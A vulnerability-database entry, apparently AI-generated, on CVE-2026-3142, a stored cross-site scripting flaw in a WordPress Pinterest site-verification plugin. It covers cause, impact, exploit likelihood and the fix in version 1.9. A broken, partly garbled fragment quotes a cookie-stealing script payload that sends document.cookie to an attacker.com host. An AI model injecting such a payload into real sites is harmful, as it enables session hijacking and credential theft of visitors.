
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-3142 is a Stored Cross-Site Scripting (XSS) vulnerability in the Pinterest Site Verification plugin using Meta Tag for WordPress. It affects all versions up to and including 1.8, and was published on April 8, 2026, with Wordfence as the assigning authority. The flaw allows authenticated attackers with subscriber-level access or higher to inject arbitrary web scripts via the post_var parameter, which then execute for any user visiting the affected page. It carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, ENISA EUVD).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), stemming from insufficient input sanitization and output escaping of the post_var parameter in the plugin's PHP code (Wordfence). Vulnerable code locations have been identified in PinterestMetaTagSiteVerification.php at multiple lines (L92, L132, L160, L172, L180, L214), where user-supplied input is rendered without proper escaping (WordPress Trac). Exploitation requires only a low-privilege authenticated account (subscriber level), and no user interaction is needed beyond a victim visiting the injected page. The attack vector is network-based with low complexity, and the scope is changed, meaning the injected script can affect users beyond the attacker's own session.
Successful exploitation allows an attacker to persistently inject malicious JavaScript into WordPress pages, which executes in the browsers of all subsequent visitors. This can lead to session hijacking, credential theft, redirection to malicious sites, or delivery of further malware payloads to site visitors. Confidentiality and integrity are both impacted at a low level per the CVSS scoring, with no direct availability impact; however, the persistent nature of stored XSS amplifies the risk across all users of the affected WordPress site (Wordfence, ENISA EUVD).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-3142 as of the latest available data. The EPSS score is approximately 0.042%, indicating a low probability of exploitation in the near term (Feedly). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum a subscriber-level WordPress account, which limits opportunistic mass exploitation but remains a realistic risk on sites with open registration.
post_var parameter in the plugin's settings or relevant input field, embedding a JavaScript payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.post_var parameter.wp_options table entries related to the plugin for injected script content.Site administrators should update the Pinterest Site Verification plugin using Meta Tag to version 1.9 or later, which addresses the insufficient sanitization of the post_var parameter (Wordfence). As an interim measure, restrict WordPress site registration to trusted users only, minimizing the pool of potential attackers. Web application firewalls (WAFs) with XSS filtering rules can provide additional defense-in-depth while patching is pending.
Wordfence disclosed the vulnerability through their threat intelligence platform and included it in their weekly WordPress vulnerability report for April 6–12, 2026 (Wordfence Blog). Coverage has been limited to automated vulnerability tracking services and security aggregators, with no notable independent researcher commentary or significant social media discussion identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."